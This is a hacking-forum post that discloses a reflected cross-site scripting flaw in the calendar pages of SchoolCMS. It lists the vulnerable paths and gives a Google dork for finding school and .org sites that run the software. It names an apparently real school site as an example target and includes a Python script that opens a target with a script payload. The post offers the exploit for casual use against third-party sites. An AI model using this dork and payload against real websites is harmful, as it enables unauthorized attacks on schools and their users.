SchoolCMS software vulnerable to more XSS.

Shame this time its not persistent, I originally found a persistent XSS on this software in the eventform.php file. There is records for this on exploit.db. This times its a non persistent but it remains in dozens and dozens of schools and .org sites. 

Exploit:
/old_core/cal/month.php?cid=
/old_core/cal/day.php?catid=
/old_core/cal/week.php?catid=

The y parameter is vulnerable to XSS. If you are too lazy to do manually, here is a python script to do it for you Tongue.


Code: SELECT ALL 
#!/usr/bin/python
import sys
import webbrowser
import urllib2
&nbsp;&nbsp;&nbsp;&nbsp; 
print "######################################"
print "#SchoolCMS auto-XSS inject script&nbsp;&nbsp;&nbsp;&nbsp;#"
print "#Dork: inurl:/old_core/cal/month.php #"
print "#Author: VipVince&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#"
print "#Vendor: http://www.poweritschools.com&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#"
print "#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#"
print "######################################"
&nbsp;&nbsp;&nbsp;&nbsp; 
print "XSS lies in y=parameter of the URL in the calender. (Year)"
print "After dorking a site, Enter URL like: http://www.oaklandschoolsnj.org"
print "Let the script do the rest Wink"

payload = "/old_core/cal/month.php?cid=&catid=&m=-1&w=5&y=<script>alert(1)</script>"
site = raw_input('Enter site to XSS: ')
inject = webbrowser.open(site+payload)
raw_input("Press any key to exit ")

Enjoy